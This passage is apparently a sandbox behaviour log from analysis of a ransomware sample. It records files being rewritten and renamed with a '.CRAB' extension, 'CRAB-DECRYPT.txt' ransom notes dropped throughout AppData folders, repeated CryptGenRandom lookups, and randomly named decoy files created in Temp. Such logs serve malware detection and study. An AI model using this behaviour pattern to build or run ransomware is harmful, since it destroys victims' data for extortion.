| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wsRGB.icc, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wsRGB.icc, size = 1048576, size_out = 2676 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wsRGB.icc, size = 2688 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wsRGB.icc, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wsRGB.icc, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wsRGB.icc, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wsRGB.icc.CRAB |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\ActiveSync\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Color\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Adobe\Color\Profiles\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\ActiveSync\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Color\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Adobe\Color\Profiles\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\ActiveSync\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Adobe\Color\Profiles\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-ZZr9xYkqr28kj4Ewly.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\0rGnGm QreoWsur9e.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1dIAUE6JjxOcRnUgYL.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2nz3uSwqyVXWxqCOCF18.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dBLEEVc8Nl3ui3b.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\F-PsEooiB7-oXDbtz1id.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fAfwVeyGLAK7P93Obz3Y.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hLFQVM89GDd j6TcCek.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LtnS7XaVnVQol2Qn1xH.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\mLE9mf-BdFdOibSg9l.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\oUGX-5zbSZw.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\QZg7oH35.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
